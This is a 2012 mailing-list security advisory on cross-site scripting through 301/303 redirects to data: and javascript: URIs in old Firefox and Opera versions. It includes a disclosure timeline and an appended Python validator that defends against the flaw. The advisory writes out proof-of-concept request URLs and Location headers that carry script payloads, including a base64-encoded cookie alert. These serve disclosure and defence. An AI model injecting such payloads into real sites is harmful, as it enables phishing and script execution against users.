Message-ID: <00cf01cd9f3e$398f3e10$9b7a6fd5@ml>
Date: Sun, 30 Sep 2012 22:02:25 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Cross-Site Scripting via redirectors 301 and 303
	in different browsers

Hello list!

Here is information about Cross-Site Scripting vulnerabilities via 
redirectors with statuses 301 and 303 in different browsers. This is a 
continuation of my 2009 and 2010 advisories and articles about 302 
redirectors, such as the article "Cross-Site Scripting attacks via 
redirectors" (http://websecurity.com.ua/3386/).

On 16.09.2012 I found that Mozilla had silently fixed two XSS 
vulnerabilities via 302 redirectors in the browsers Firefox 10.0.7 and 
Firefox 15.0.1 (about which I had informed them by e-mail and in Bugzilla 
and written in articles in 2009 and 2010), without any official 
announcement and without referencing me. As I checked in detail in all 
branches of the browser from 3.0.19 to 15.0.1, in Mozilla Firefox 8.0.1 
these XSS were working, and in 9.0.1 they already were not, i.e. they were 
silently fixed in version 9.0.

And that day I found Cross-Site Scripting vulnerabilities in the browsers 
Mozilla Firefox and Opera via the Location header with statuses 301 and 
303. The attacks via other 30x statuses don't work.

-------------------------
Affected products:
-------------------------

Vulnerable are Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 and previous 
versions, and Opera 10.62 and previous versions. The browsers IE6, IE7, IE8 
and Chrome are not affected.

Opera Software fixed (in a lame way without referencing me, which was not 
the first time for them) this hole in Opera 10.63. The fix was for 302 
redirectors, which I wrote about earlier concerning Opera and other 
browsers, but it should also concern 301 and 303 redirectors.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS attacks via location-header redirectors with 301 and 303 statuses.

Attack #1:

The attack is performed by redirecting to a data: URI (with or without the 
use of base64).

With a request to a script at the web site:

http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Which returns a 301 code in the answer:

HTTP/1.1 301 Moved Permanently
Location: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

Or returns a 303 code in the answer:

HTTP/1.1 303 See other
Location: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

The attack works in Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 and Opera 
10.62. Because in the browsers Firefox and Opera the code is executed not 
in the context of this site, there is no access to cookies. This 
vulnerability in browsers can be used for conducting phishing attacks and 
executing JavaScript code.

Attack #2:

The attack is performed by redirecting to a javascript: URI.

With a request to a script at the web site:

http://site/script.php?param=javascript:alert(document.cookie)

Which returns a 301 code in the answer:

HTTP/1.1 301 Moved Permanently
Location: javascript:alert(document.cookie)

Or returns a 303 code in the answer:

HTTP/1.1 303 See other
Location: javascript:alert(document.cookie)

The attack works in Opera 10.62 (as Strictly social XSS). Because in Opera 
the code is executed not in the context of this site, there is no access to 
cookies. This vulnerability in the browser can be used for conducting 
phishing attacks and executing JavaScript code.

------------
Timeline:
------------ 

2009.03.04 - informed Mozilla about XSS via different charsets and the 
Charset Remembering vulnerability. Mozilla ignored.
2009.08.28 - informed Mozilla about an XSS vulnerability via a redirector 
with 302 status. Mozilla ignored.
2010.08.07 - informed Mozilla about another XSS vulnerability via a 
redirector with 302 status. Mozilla ignored.
2011.11.08 - Mozilla fixed part of the charset holes in MFSA 2011-47 (after 
being informed by another researcher).
2011.12.20 - Mozilla silently fixed XSS via 302 redirectors in Firefox 9.0.
2012.04.24 - Mozilla fixed another part of the charset holes in MFSA 2012-24 
(after being informed by another researcher).
2012.09.16 - found the hidden Mozilla fix of 302 redirectors in Firefox 
10.0.7 and Firefox 15.0.1. And later found that it was fixed already in 9.0.
2012.09.16 - checked XSS attacks via 301 and 303 redirectors in different 
browsers.
2012.09.25 - disclosed at my site (http://websecurity.com.ua/6067/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
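
A server-side check for the redirector described in the advisory above, as an added example that is not part of the original message: it refuses to echo data:, javascript: or off-site values into the Location header. The function names, the fallback path and the use of Python are assumptions for illustration; `site` is the advisory's own placeholder host.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"site"}   # assumption: the advisory's placeholder host name
FALLBACK = "/"             # assumption: a safe default landing page
REASONS = {301: "Moved Permanently", 303: "See Other"}


def safe_redirect_target(param):
    """Return param if it is safe to echo into Location, else FALLBACK."""
    # Control characters and spaces: CR/LF would split the header, and browsers
    # drop tabs/newlines before reading the scheme ("java\tscript:").
    if not param or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in param):
        return FALLBACK
    if "\\" in param:      # browsers treat "\" like "/" in the authority part
        return FALLBACK
    try:
        parts = urlsplit(param)
    except ValueError:     # malformed authority, e.g. an unclosed "["
        return FALLBACK
    if not parts.scheme and not parts.netloc:
        # Site-local path only: exactly one leading slash ("//" starts a host).
        ok = param.startswith("/") and not param.startswith("//")
        return param if ok else FALLBACK
    # data: and javascript: (any letter case) fail here; urlsplit lowercases.
    if parts.scheme not in ALLOWED_SCHEMES:
        return FALLBACK
    if (parts.hostname or "").lower() not in ALLOWED_HOSTS:
        return FALLBACK
    return param


def redirect_response(param, status=301):
    """Build the status line and Location header for a 301 or 303 redirect."""
    target = safe_redirect_target(param)
    return f"HTTP/1.1 {status} {REASONS[status]}\r\nLocation: {target}\r\n\r\n"


if __name__ == "__main__":
    # Constructed inputs: the first two are the param values from the advisory.
    for p in ("data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+",
              "javascript:alert(document.cookie)",
              "//other.example/", "http://site/next.php", "/home"):
        print(repr(p), "->", safe_redirect_target(p))
```
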

